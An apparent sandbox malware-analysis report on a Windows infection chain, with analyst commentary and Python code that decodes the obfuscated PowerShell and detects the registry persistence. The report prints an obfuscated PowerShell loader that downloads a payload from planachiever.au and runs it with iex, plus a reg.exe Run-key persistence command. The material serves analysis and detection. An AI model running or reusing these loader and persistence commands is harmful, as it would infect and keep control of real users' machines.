Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOr
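The PowerShell stage above is readable once its string builder is understood. Every literal handed to Slappelse199 is decoded by keeping one character in six, starting at index 5 ($Tidsskriftssamlingens170 starts at 5 and advances by 6 until the index runs past the end of the string); the other five characters of each group are filler, and the $Nysgerrighederne=Format-List assignment inside the loop does nothing. Haggardly is `.($Remittable) ($x)`, which with $Remittable decoded is a dot-sourced Invoke-Expression of each decoded fragment. The following is an added example, not part of the Joe Sandbox report or of the sample, that re-implements the loop in Python and runs it over literals copied from the command line shown above. Only literals that survived extraction intact are included; a few others in the report text lost non-ASCII filler characters and no longer line up on the stride. The dictionary keys are the script's own variable names, except "Haggardly#1" and "Haggardly#2", which are labels of mine for the first two anonymous arguments passed to Haggardly.

```python
from typing import Dict, List

# Literals copied from the PowerShell command line in the report (constructed
# table, keyed by the script's variable names; "Haggardly#1/#2" are my labels
# for the first two anonymous Haggardly arguments). Pieces assigned with +=
# are listed in order. Literals that lost characters in the report text are
# deliberately omitted.
SAMPLE_LITERALS: Dict[str, List[str]] = {
    "Gildhall": ["theren coate OverTPudsi.flerdW",
                 "SygemeKarbob Kontc For lCopori EfteeArbejNFarest"],
    "Horede": ["InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/"],
    "Gl": ["Me inTBjerglDe.ousI per1Inani2"],
    "Taw": ["UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat"],
    "Remittable": ["Enjoii uncoePomolX"],
    "dipolen": ["Aliqu>"],
    "Aktricens": ["ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutogl"
                  "Konj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.kr"
                  "Posta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds-"
                  " Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerf"
                  "GaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa"],
    "Haggardly#1": ["Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,il"
                    "Beskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.ntern"
                    "defunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+"
                    "Exaes$ fdmpmP.mpeo winko reinS"],
    "Haggardly#2": ["sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle"
                    " ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhre"
                    "P litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueR"
                    "Mazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanI"
                    "HonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)"],
}


def slappelse199(s: str, start: int = 5, step: int = 6) -> str:
    """Python port of the script's decoder loop.

    PowerShell original: $i=5; do { $out += $s[$i]; $i += 6 } until (!$s[$i])
    Indexing past the end of a string yields $null in PowerShell, which is what
    ends the loop, so the result is the same as the slice s[5::6].
    """
    out = []
    i = start
    while i < len(s):
        out.append(s[i])
        i += step
    return "".join(out)


def decode_literals(literals: Dict[str, List[str]]) -> Dict[str, str]:
    """Decode every variable; pieces appended with += are concatenated in order."""
    return {name: "".join(slappelse199(piece) for piece in pieces)
            for name, pieces in literals.items()}


if __name__ == "__main__":
    for name, value in decode_literals(SAMPLE_LITERALS).items():
        print(f"${name:<12} -> {value}")
```

Decoded (PowerShell is case-insensitive, so the mixed case is irrelevant), the pieces account for the behaviour recorded elsewhere in this report: $Gildhall is Net.WebClient; $Taw and $Horede set a User-Agent header beginning Mozilla/, the Firefox string seen in the GET request to planachiever.au; $Gl is Tls12; $Remittable is iex; $Aktricens is https://planachiever.au/admin-user/Telefonkder.fla, the first file requested; the first Haggardly call sets $global:plumbums to $env:AppData plus '\preconversion.Pri', the path listed under "File created"; and the second splits $Aktricens on $dipolen ('>') into $Serviceprisernes, so a single literal can carry several fallback URLs.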
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\re
g.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
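The reg.exe command above is the persistence mechanism, and it is built so that the Run value itself carries no payload. The value Afbenyt is REG_EXPAND_SZ, its executable is hidden behind an environment variable (%Pigling%; that it resolves to powershell.exe is an assumption based on the -windowstyle argument, since the report does not show the variable being set), and the only script body is fetched at logon from a second registry location, HKCU\Software\Abanga62\metanetwork, by (gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork') and then handed back to %Pigling% for execution. Deleting the dropped files therefore does not remove the stage that restarts the infection. The following is an added example, not part of the report, that parses `reg query` output for the Run key, flags values showing this pattern, and reports where the second stage is stored so it can be exported before cleanup. The query output below, including the OneDrive entry, is constructed sample input.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample input: what
#   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# would print on a host carrying the value from this report, plus one ordinary entry.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Afbenyt    REG_EXPAND_SZ    %Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)
"""

# Variables a legitimate Run value may start with. A command that starts with any
# other %VAR% hides its executable behind an attacker-defined environment variable.
STANDARD_PATH_VARS = {
    "systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
    "programdata", "appdata", "localappdata", "userprofile", "commonprogramfiles",
}

VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.+)$")
LEADING_ENV_VAR = re.compile(r"^%(?P<var>[^%]+)%")
# (gi 'HKCU:\Key\').GetValue('name'): the script body lives in another registry value
REGISTRY_READ = re.compile(
    r"\((?:gi|Get-Item)\s+'(?P<key>HK[A-Z]+:[^']*)'\)\.GetValue\('(?P<value>[^']+)'\)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)
# %VAR% ($x): the fetched string is passed straight back to the interpreter
INDIRECT_EXEC = re.compile(r"%[^%]+%\s*\(\s*\$\w+\s*\)")


@dataclass
class RunValueFinding:
    name: str
    reg_type: str
    data: str
    reasons: List[str] = field(default_factory=list)
    payload_location: Optional[Tuple[str, str]] = None  # (registry key, value name)


def parse_run_values(reg_query_output: str) -> List[Tuple[str, str, str]]:
    """Turn `reg query` text into (value name, type, data) triples."""
    values = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"].strip()))
    return values


def assess_run_value(name: str, reg_type: str, data: str) -> RunValueFinding:
    """Score one Run value against the traits of the Afbenyt entry."""
    finding = RunValueFinding(name, reg_type, data)
    env = LEADING_ENV_VAR.match(data)
    if env and env["var"].lower() not in STANDARD_PATH_VARS:
        finding.reasons.append(f"command starts with non-standard variable %{env['var']}%")
    read = REGISTRY_READ.search(data)
    if read:
        finding.payload_location = (read["key"], read["value"])
        finding.reasons.append(f"script body read from registry value {read['key']}{read['value']}")
    if HIDDEN_WINDOW.search(data):
        finding.reasons.append("interpreter started with a hidden window")
    if INDIRECT_EXEC.search(data):
        finding.reasons.append("fetched string is executed by the variable-named interpreter")
    return finding


def triage_run_key(reg_query_output: str) -> List[RunValueFinding]:
    """Return only the Run values that show at least one suspicious trait."""
    findings = (assess_run_value(*v) for v in parse_run_values(reg_query_output))
    return [f for f in findings if f.reasons]


if __name__ == "__main__":
    for f in triage_run_key(SAMPLE_REG_QUERY):
        print(f"{f.name} ({f.reg_type}): {'; '.join(f.reasons)}")
        if f.payload_location:
            key, value = f.payload_location
            print(f"  second stage stored in {key} value {value}; export it before removing the Run value")
```

On the sample input only Afbenyt is returned, with all four traits and the payload location HKCU:\Software\Abanga62\ / metanetwork; the OneDrive entry, and any value that starts with a standard variable such as %SystemRoot%, is left alone. The same parser works on the HKLM Run and RunOnce keys, since `reg query` prints them in the same layout.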
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: stem.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1971988827.0000000007314000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000A.00000002.1971988827.000000000737C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbW source: powershell.exe, 0000000A.00000002.1938539115.0000000000B93000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

Source: Yara match File source: 0000000E.00000002.2499274880.00000000054F3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1988703799.000000000A323000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
